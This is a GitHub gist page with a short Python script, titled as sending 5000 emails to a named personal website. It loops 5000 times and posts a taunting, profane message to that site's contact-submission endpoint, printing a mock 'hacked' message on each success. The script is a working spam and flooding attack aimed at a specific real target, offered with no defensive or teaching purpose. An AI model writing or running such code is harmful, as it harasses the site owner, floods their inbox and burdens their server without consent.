Skip to content

Instantly share code, notes, and snippets.

@kylefrost
Last active September 15, 2015 13:36
Show Gist options
  • Save kylefrost/c4d44b5a192d531a4384 to your computer and use it in GitHub Desktop.
Save kylefrost/c4d44b5a192d531a4384 to your computer and use it in GitHub Desktop.
Send www.hmajoros.com 5000 emails
import requests
for i in range(5000):
payload = { "name" : "133t h4x0r", "email" : "133t@h4x0r.fuck", "message" : "wow so h4x0r3d, much fuck3d, 3hacked5me" }
r = requests.post("http://www.hmajoros.com/contact-submit", data=payload)
print "h4x0r3d" if r.status_code == 200 else "no can haz?"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment